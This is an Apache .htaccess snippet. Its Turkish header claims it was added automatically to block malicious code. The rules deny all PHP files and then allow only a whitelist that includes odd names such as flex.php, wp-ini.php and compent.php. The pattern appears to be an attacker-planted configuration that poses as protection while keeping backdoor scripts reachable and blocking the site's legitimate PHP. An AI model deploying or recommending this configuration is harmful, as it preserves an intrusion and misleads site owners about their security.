# ZARARLI KOD ENGELLEME - OTOMATİK EKLENDİ <FilesMatch "\.(php|php3|php4|php5|phtml|phps)$"> Order Deny,Allow Deny from all </FilesMatch> <FilesMatch "^(404.php|flex.php|forum.php|wp-ini.php|single.php|compent.php|settings.php|index.php)$"> Order Allow,Deny Allow from all </FilesMatch> <IfModule mod_rewrite.c> RewriteEngine On RewriteRule ^wp-admin/ - [L] </IfModule>